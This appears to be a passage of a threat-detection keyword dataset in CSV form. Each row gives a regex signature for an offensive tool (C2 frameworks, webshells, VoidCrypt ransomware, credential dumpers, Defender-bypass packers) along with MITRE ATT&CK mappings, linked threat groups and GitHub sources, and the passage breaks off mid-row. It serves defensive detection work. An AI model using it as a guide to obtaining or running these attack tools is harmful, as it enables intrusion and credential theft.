"*ftp.halifax.rwth-aachen.de/blackarch/*/os/*",".{0,1000}ftp\.halifax\.rwth\-aachen\.de\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45373" 
"*ftp.icm.edu.pl/pub/Linux/dist/blackarch/*/os/*",".{0,1000}ftp\.icm\.edu\.pl\/pub\/Linux\/dist\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45374" "*ftp.kddilabs.jp/Linux/packages/blackarch/*/os/*",".{0,1000}ftp\.kddilabs\.jp\/Linux\/packages\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45375" "*ftp.linux.org.tr/blackarch/*/os/*",".{0,1000}ftp\.linux\.org\.tr\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45376" "*FtpC2.exe*",".{0,1000}FtpC2\.exe.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","45377" "*FtpC2.Tasks*",".{0,1000}FtpC2\.Tasks.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - 
TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","45378" "*ftshell -*",".{0,1000}ftshell\s\-.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","45380" "*ftshell.v3*",".{0,1000}ftshell\.v3.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","45381" "*Fuck off, no GSSAPI*",".{0,1000}Fuck\soff,\sno\sGSSAPI.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","0","#content","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","45386" "*Fuck-Etw-main*",".{0,1000}Fuck\-Etw\-main.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","45387" "*fucksetuptools*",".{0,1000}fucksetuptools.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 
- T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","45388" "*FuckThatPacker.*",".{0,1000}FuckThatPacker\..{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","N/A","10","10","637","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z","45389" "*fuckyoufuckyoufuckyoufuckyoufuckyou*",".{0,1000}fuckyoufuckyoufuckyoufuckyoufuckyou.{0,1000}","offensive_tool_keyword","VoidCrypt","VoidCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","45390" "*FUD Payload Generator by Black$hell256*",".{0,1000}FUD\sPayload\sGenerator\sby\sBlack\$hell256.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#content","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","45391" "*FudgeC2.*",".{0,1000}FudgeC2\..{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a 
command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45392" "*FudgeC2Persistence*",".{0,1000}FudgeC2Persistence.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45393" "*FudgeC2Viewer.py*",".{0,1000}FudgeC2Viewer\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45394" "*fuegoShell-bind>*",".{0,1000}fuegoShell\-bind\>.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","45395" "*Fuegoshell-client started*",".{0,1000}Fuegoshell\-client\sstarted.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","45396" 
"*fuegoShell-reverse>*",".{0,1000}fuegoShell\-reverse\>.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","45397" "*Fuegoshell-server started*",".{0,1000}Fuegoshell\-server\sstarted.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","45398" "*fuff *-input-shell*",".{0,1000}fuff\s.{0,1000}\-input\-shell.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","45399" "*fuff *-scraperfile*",".{0,1000}fuff\s.{0,1000}\-scraperfile.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","45400" "*fuff *-scrapers*",".{0,1000}fuff\s.{0,1000}\-scrapers.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","45401" "*fugawi/EASSniper*",".{0,1000}fugawi\/EASSniper.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force 
attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","45402" "*Full url - ex https://hashcapture.com*",".{0,1000}Full\surl\s\-\sex\shttps\:\/\/hashcapture\.com.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","45403" "*full; Wait-Process rundll32*",".{0,1000}full\;\sWait\-Process\srundll32.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","45404" "*FULLSHADE/WindowsExploitationResources*",".{0,1000}FULLSHADE\/WindowsExploitationResources.{0,1000}","offensive_tool_keyword","WindowsExploitationResources","Resources for Windows exploit development","T1203 - T1210 - T1212 - T1216 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/FULLSHADE/WindowsExploitationResources","1","1","N/A","N/A","N/A","10","1569","322","2021-12-20T00:21:07Z","2020-05-26T07:19:54Z","45405" "*FullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn*",".{0,1000}FullyQualifiedAssemblyName\=0\;\\\\r\\\\nClrInstanceID\=StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - 
T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","45406" "*func decryptMalware(*",".{0,1000}func\sdecryptMalware\(.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","45407" "*func_get_powershell_dll*",".{0,1000}func_get_powershell_dll.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","45408" "*func_install_wine_dotnettojscript*",".{0,1000}func_install_wine_dotnettojscript.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","45409" "*function actionBruteforce() {*",".{0,1000}function\sactionBruteforce\(\)\s\{.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","45410" "*function Amnesiac *",".{0,1000}function\sAmnesiac\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45411" "*function Base64_Obfuscation*",".{0,1000}function\sBase64_Obfuscation.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","0","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","45412" "*function BXOR_Obfuscation*",".{0,1000}function\sBXOR_Obfuscation.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","0","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","45413" "*function Decrypt-RDCMan*",".{0,1000}function\sDecrypt\-RDCMan.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using 
DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","45414" "*function DumpSAM*",".{0,1000}function\sDumpSAM.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","45415" "*function Find-KeePassconfig*",".{0,1000}function\sFind\-KeePassconfig.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45416" "*function Find-KeePassconfig*",".{0,1000}function\sFind\-KeePassconfig.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","45417" "*function GNLPH*Get-ItemProperty ""HKLM:SAM\SAM\Domains\Account\Users\*",".{0,1000}function\sGNLPH.{0,1000}Get\-ItemProperty\s\""HKLM\:SAM\\SAM\\Domains\\Account\\Users\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","#registry","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","45418" "*function HTTP-Backdoor-Logic*",".{0,1000}function\sHTTP\-Backdoor\-Logic.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45419" "*function ImpersonateFromParentPid*",".{0,1000}function\sImpersonateFromParentPid.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","45420" "*function Invoke-SessionExec*",".{0,1000}\?function\sInvoke\-SessionExec.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","0","#content","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","45421" "*function KematianLoader*",".{0,1000}function\sKematianLoader.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","45422" "*Function list_localadmins()*",".{0,1000}Function\slist_localadmins\(\).{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","45423" "*function Local:Get-KeePassINIFields*",".{0,1000}function\sLocal\:Get\-KeePassINIFields.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","45424" "*function Local:Inject-RemoteShellcode *",".{0,1000}function\sLocal\:Inject\-RemoteShellcode\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","45425" "*function Persistence_HTTP*",".{0,1000}function\sPersistence_HTTP.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45426" "*function PrivEsc*",".{0,1000}function\sPrivEsc.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","45427" "*function psenum*",".{0,1000}function\spsenum.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - 
CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45428" "*Function PsMapExec*",".{0,1000}Function\sPsMapExec.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","45429" "*function Use-Zeus*",".{0,1000}function\sUse\-Zeus.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","45430" "*FunnyWolf/pystinger*",".{0,1000}FunnyWolf\/pystinger.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona 